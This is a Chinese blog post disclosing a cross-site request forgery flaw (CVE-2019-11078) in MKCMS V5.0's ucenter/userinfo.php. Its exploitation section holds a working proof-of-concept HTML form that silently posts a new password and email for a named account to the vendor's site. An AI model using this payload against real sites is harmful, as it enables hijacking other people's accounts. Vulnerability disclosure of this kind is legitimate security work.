MKCMS V5.0存在CSRF漏洞

  • A+
所属分类:颓废's Blog

一、漏洞摘要

漏洞名称: MKCMS V5.0存在CSRF漏洞
上报日期: 2019-04-04
漏洞发现者: cisk
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0
CVE编号: CVE-2019-11078

二、漏洞概述

CSRF: ucenter/userinfo.php
post请求中没有带token,也没有验证Referer,导致产生csrf漏洞
MKCMS V5.0存在CSRF漏洞

三、利用方法

构造如下poc.html,并访问poc.html;将修改lduo123账号的密码

<html>   <body>   <script>history.pushState('', '', '/')</script>     <form action="http://v.micool.top/ucenter/userinfo.php" method="POST">       <input type="hidden" name="u&#95;name" value="lduo123" />       <input type="hidden" name="u&#95;password" value="123456" />       <input type="hidden" name="u&#95;phone" value="1314520" />       <input type="hidden" name="u&#95;qq" value="" />       <input type="hidden" name="u&#95;email" value="admin&#64;gmail&#46;com" />       <input type="hidden" name="save" value="" />       <input type="submit" value="Submit request" />     </form>       </body> </html>

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: